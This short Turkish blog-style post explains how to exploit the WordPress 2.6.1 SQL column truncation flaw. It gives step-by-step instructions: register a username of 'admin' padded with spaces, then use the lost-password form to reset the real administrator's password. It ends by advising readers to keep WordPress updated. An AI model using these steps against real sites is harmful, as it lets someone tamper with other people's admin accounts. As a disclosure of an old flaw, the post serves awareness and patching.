
1. Şu adres gidin: siteadi.com/wp-login.php?action=register
2. Yeni kullanıcı kaydı yapın:
Kullanıcı adı: admin x
E-Posta: E-Posta adresiniz
Kullanıcı adı şu şekilde olmalı: admin[55 tane boşluk karakteri]x
Şimdi admin hesabının şifresini değişelim.
3. Şu adres gidin: siteadi.com/wp-login.php?action=lostpassword
4. E-Posta adresinizi yazın ve gönderin.
5. E-Postanızı kontrol edin, şifre sıfırlama bağlantısı gelmiştir.
6. Bu bağlantıya tıklarsanız admin hesabının şifresi sıfırlanır. Yeni şifre admin’in gerçek e-posta adresine gitmiştir.
Bu açık zararsız gözüksede. Kullanmış olduğumuz WordPress’te bunun gibi birçok açık olacağının kanıtıdır. Bu yüzden WordPress sistemlerinizi sürekli güncel tutmanızda fayda var.
Wordpress, wordpress 2.6.1, WordPress 2.6.1 Açığı, WordPress 2.6.1 SQL Column Truncation Vulnerability, wp